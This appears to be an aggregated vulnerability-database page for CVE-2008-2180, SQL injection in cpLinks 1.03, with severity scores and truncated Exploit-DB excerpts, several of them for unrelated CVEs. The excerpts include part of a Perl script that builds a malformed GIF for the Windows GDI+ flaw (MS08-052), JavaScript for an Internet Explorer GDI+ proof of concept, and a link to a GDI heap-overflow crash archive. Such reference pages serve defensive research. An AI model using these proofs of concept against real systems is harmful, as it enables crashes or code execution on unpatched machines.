CVE-2008-2180
published 2008-05-13CVE-2008-2180: Multiple SQL injection vulnerabilities in cpLinks 1.03, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.98%
57.8th percentile
Multiple SQL injection vulnerabilities in cpLinks 1.03, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) admin_username parameter (aka the username field) to admin/index.php and the (2) search_text and (3) search_category parameters to search.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cplinks | cplinks | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
exploitdb·2009-09-15
CVE-2008-6447 EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
---
#####################################################################################
Application: EasyMail Quicksoft 6.0.2.0
Platforms: Windows XP Professional French SP2
crash: IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
1) Introduction
Create, send, download, parse, print and store internet email messages in your classic windows application. Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, P
Exploit-DB
Microsoft Windows - GDI+ (PoC) (MS08-052) (2)
exploitdb·2008-10-09
CVE-2008-3013 Microsoft Windows - GDI+ (PoC) (MS08-052) (2)
Microsoft Windows - GDI+ (PoC) (MS08-052) (2)
---
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
#!/usr/bin/perl
#
use strict;
my $gif =
"\x47\x49\x46\x38\x39\x61". # GIF header
"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor
# COLOR Stream
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33
Exploit-DB
Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
exploitdb·2008-09-28
CVE-2007-5348 Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
---
ef\:* { behavior: url(#default#VML); }
MS08-052: GDI+ Vulnerability
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
# milw0rm.com [2008-09-28]
Exploit-DB
Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)
exploitdb·2008-08-29
CVE-2008-1083 Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)
Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)
---
CreateDIBPatternBrushPt Heap Overflow DOS
By Ac!dDrop
This was tested on
Windows XP Sp2
GDI32.dll 5.1.2600.3099
Internet explorer 6.0.2900.2180
Causes Explorer.exe to crash.
and causes Internet explorer to close silently.
This is work in progress , i am still trying to make it run arbitary code.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6330.rar (2008-EMF_DOS.rar)
# milw0rm.com [2008-08-29]
Exploit-DB
Cplinks 1.03 - Authentication Bypass / SQL Injection / Cross-Site Scripting
exploitdb·2008-05-04
CVE-2008-2181 Cplinks 1.03 - Authentication Bypass / SQL Injection / Cross-Site Scripting
Cplinks 1.03 - Authentication Bypass / SQL Injection / Cross-Site Scripting
---
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)
Author :: InjEctOr [s0f (at) w (dot) cn]
&& FishEr762 [SQ7 (at) w (dot) cn ]
Script Site :: http://www.cplinks.com/
Dork :: ThinkinG
Greets :: Allah ,TryaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------
No writeups or analysis indexed.
http://secunia.com/advisories/30024http://www.securityfocus.com/bid/29035http://www.vupen.com/english/advisories/2008/1431/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42170https://www.exploit-db.com/exploits/5538http://secunia.com/advisories/30024http://www.securityfocus.com/bid/29035http://www.vupen.com/english/advisories/2008/1431/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42170https://www.exploit-db.com/exploits/5538
2008-05-13
Published